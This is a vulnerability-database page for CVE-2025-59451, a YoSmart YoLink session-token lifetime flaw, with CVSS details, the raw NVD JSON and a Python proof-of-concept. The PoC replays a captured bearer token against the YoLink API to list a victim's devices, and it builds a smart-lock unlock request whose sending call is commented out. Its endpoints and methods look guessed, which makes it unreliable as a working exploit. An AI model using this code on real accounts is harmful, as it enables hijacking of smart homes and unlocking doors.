Security Vulnerability Report
中文
CVE-2025-59451 CVSS 3.5 LOW

CVE-2025-59451

Published: 2025-10-06 20:15:37
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The YoSmart YoLink application through 2025-10-02 has session tokens with unexpectedly long lifetimes.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

YoSmart YoLink应用 <= 2025-10-02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59451 PoC - YoSmart YoLink Session Token Long Lifetime # This PoC demonstrates how an attacker can exploit the long-lived session token # to maintain unauthorized access to a YoLink account. import requests import time import json class YoLinkSessionExploit: """ PoC for CVE-2025-59451: YoSmart YoLink Session Token Long Lifetime Vulnerability The vulnerability exists because YoLink application issues session tokens with unexpectedly long lifetimes, allowing attackers to maintain unauthorized access for extended periods after token compromise. """ def __init__(self, target_url="https://api.yosmart.com"): self.target_url = target_url self.session = requests.Session() self.captured_token = None self.token_acquired_time = None def simulate_token_capture(self, token): """ Simulate capturing a session token through various attack vectors: - Network sniffing (MITM) - Malware/keylogger - Browser storage theft - Phishing """ self.captured_token = token self.token_acquired_time = time.time() print(f"[+] Session token captured: {token[:20]}...") print(f"[+] Capture time: {time.ctime(self.token_acquired_time)}") def check_token_validity(self): """ Check if the captured token is still valid after extended period. In vulnerable versions, the token remains valid for an unusually long time. """ if not self.captured_token: print("[-] No token captured") return False headers = { "Authorization": f"Bearer {self.captured_token}", "Content-Type": "application/json" } # Attempt to access user account info with captured token try: response = self.session.get( f"{self.target_url}/open/yolink/v2/api", headers=headers, params={"method": "Home.getDeviceList"} ) elapsed = time.time() - self.token_acquired_time elapsed_days = elapsed / 86400 if response.status_code == 200: print(f"[+] Token STILL VALID after {elapsed_days:.2f} days!") print(f"[+] Response: {response.text[:200]}") return True else: print(f"[-] Token expired after {elapsed_days:.2f} days") return False except Exception as e: print(f"[-] Error: {e}") return False def exploit_smart_home(self): """ Once token is validated, exploit access to control smart home devices. """ if not self.check_token_validity(): return headers = { "Authorization": f"Bearer {self.captured_token}", "Content-Type": "application/json" } # Example: List all smart devices under victim's account payload = { "method": "Home.getDeviceList", "params": {} } response = self.session.post( f"{self.target_url}/open/yolink/v2/api", headers=headers, json=payload ) print(f"[+] Compromised devices: {response.json()}") # Example: Control a smart lock (dangerous!) unlock_payload = { "method": "DoorLock.unlock", "params": { "deviceId": "TARGET_DEVICE_ID", "duration": 30 } } # Uncomment to actually unlock (for authorized testing only!) # response = self.session.post( # f"{self.target_url}/open/yolink/v2/api", # headers=headers, # json=unlock_payload # ) def run_poc(self, captured_token): """Main PoC execution""" print("=" * 60) print("CVE-2025-59451 - YoSmart YoLink Session Token Exploit") print("=" * 60) # Step 1: Capture token (simulated) self.simulate_token_capture(captured_token) # Step 2: Wait and check validity (demonstrating long lifetime) print("\n[*] Checking token validity over extended period...") for i in range(3): print(f"\n--- Check {i+1} ---") self.check_token_validity() time.sleep(2) # In real scenario, this could be days/weeks # Step 3: Exploit print("\n[*] Attempting smart home exploitation...") self.exploit_smart_home() if __name__ == "__main__": # Example usage with a captured token (for authorized testing only) exploit = YoLinkSessionExploit() # Replace with actual captured token for testing # exploit.run_poc("captured_session_token_here") print("[*] PoC ready. Use exploit.run_poc(token) with authorized token.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59451", "sourceIdentifier": "[email protected]", "published": "2025-10-06T20:15:36.763", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YoSmart YoLink application through 2025-10-02 has session tokens with unexpectedly long lifetimes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://bishopfox.com/blog/advisories", "source": "[email protected]"}, {"url": "https://bishopfox.com/blog/how-a-20-smart-device-gave-me-access-to-your-home", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/product-support", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/sa-2025-001", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.